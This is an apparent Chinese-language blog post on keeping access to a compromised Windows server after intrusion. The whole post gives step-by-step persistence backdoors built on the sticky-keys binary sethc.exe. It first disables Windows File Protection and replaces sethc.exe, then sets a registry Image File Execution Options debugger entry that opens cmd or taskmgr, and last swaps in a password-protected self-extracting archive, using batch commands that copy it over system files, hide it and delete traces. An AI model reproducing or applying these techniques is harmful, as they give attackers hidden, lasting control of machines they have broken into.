服务器后门添加及日常维护

好大一条虫 323 次浏览 0

在拿到服务器 如何维持权限 以下记录下 windows留后门的常见方法 进行总结。以备不时之需!

0x1 自制shift后门

1. 运行>gpedit.msc>计算机配置—管理模板--系统--windows文件保护,改为已禁用.
2. 将 Cryptographic Services 服务停掉和改成手动或自动。
3. 现将C:\WINDOWS\system32 的 sethc.exe删掉 (1和2步骤就是为第三步骤的,
如果不执行1和2步骤sethc.exe会删不掉)
4. 将本文件夹sethc.exe复制C:\WINDOWS\system32进去

0x2 命令型后门

  1.  [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution       Options\\sethc.exe]"debugger"="C:\\Windows\\System32\\taskmgr.exe"
    

以上代码保存为sethc.reg

  1. 放在C:\WINDOWS\system32 C:\WINDOWS\system32\DLLCACHE
    然后打开sethc.reg taskmgr换成cmd也行

0x3 建立带密码的shift后门

1. 我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为1.bat的文件.
2. 再把这个批处理文件1.bat加到win.rar压缩包内加密.在高级选项里设置密码如:123
3. 将win.rar做成自解压格式:(添加新的自解压→Default.SFX 图形界面 RAR自解压模块→高级自解压选项→解压后运行(添加: cmd.exe 也有用SystemRoot\explorer.exe的)→模式→选择:全部隐藏覆盖所有文件→确定)
4. 然后我们再建立一个批处理文件RU.BAT,用来将win.exe(win.rar做成自解压后生成的文件)替换到system32下.

copy win.exe C:\\WINDOWS\\system32\\sethc.exe //y
copy win.exe C:\\WINDOWS\\system32\\dllcache\\sethc.exe //y

@echo off
cls
copy win.exe C:\WINDOWS\system32\sethc.exe
copy win.exe C:\WINDOWS\system32\dllcache\sethc.exe
attrib C:\WINDOWS\system32\sethc.exe sethc.exe
attrib C:\WINDOWS\system32\dllcache\sethc.exe h
echo
cls
echo.
del win.exe
del 0

发表评论 取消回复
表情 图片 链接 代码